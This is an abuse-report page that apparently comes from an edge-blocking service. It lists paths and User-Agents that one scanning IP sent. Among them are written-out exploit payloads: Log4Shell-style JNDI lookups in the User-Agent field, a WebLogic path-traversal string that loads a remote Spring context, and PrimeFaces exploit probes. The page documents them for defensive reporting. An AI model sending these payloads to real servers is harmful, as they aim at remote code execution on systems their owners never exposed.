abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 80
- Unique targets hit
- 10
- Unique paths probed
- 6,150
- Detection count
- 18
- First seen
- 2026-07-28 00:48:53 UTC
- Last seen
- 2026-07-28 01:23:01 UTC
- Block expires
- 2026-07-29 02:09:25 UTC
Sample paths probed
- /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
- /configurations.do
- /php/login.php
- /wls-wsat/ParticipantPortType11
- /broadWeb/bwconfig.asp
- /package.json
- /dfcweb/lib/cupm/nls/applicationproperties.js
- /webacs/js/xmp/nls/xmp.js
- /ws_utc/login.do
- /console/login/LoginForm.jsp
- /PasswordVault/auth/cyberark/
- /xmldata?item=All
- /console/framework/skins/wlsconsole/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://10.210.5.24:35659")
- /
- /dynamiccontent.properties.jsf?pfdrt=sc&ln=primefaces&pfdrid=%22wQR45Hj4OwBRgKBtl5v%2FG4elO1lYWl%2BZfvjy1R79FgJ%2F3H%2BKYopezNVswr9KFx%2B8XaKwW6Tq3bG8OxNcX3CjCO5%2F1SsvFbW8gn6BL38vAt03Pz2scc3fGrGm3Vi7A7wdmqDjIu5mWyXWVXipcGirQgAAAAAAAAAA%22&primesecretchk=%22QualysPrimeFacesCheck123456%22
- /login?back=%2F
- /bower.json
- /admin_ui/mas/ent/login.html
- /dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=%22wQR45Hj4OwBRgKBtl5v%2FG4elO1lYWl%2BZfvjy1R79FgJ%2F3H%2BKYopezNVswr9KFx%2B8XaKwW6Tq3bG8OxNcX3CjCO5%2F1SsvFbW8gn6BL38vAt03Pz2scc3fGrGm3Vi7A7wdmqDjIu5mWyXWVXipcGirQgAAAAAAAAAA%22&primesecretchk=%22QualysPrimeFacesCheck123456%22
- /api/v1/?format=api
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
- ${jndi:corba://10.210.5.24:43975/QUALYSTEST}
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
- Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
- ${jndi:nis://10.210.5.24:35705/QUALYSTEST}
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
- Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
- Node.js
- TNAS
- Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
- ${jndi:rmi://10.210.5.24:46291/QUALYSTEST}
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.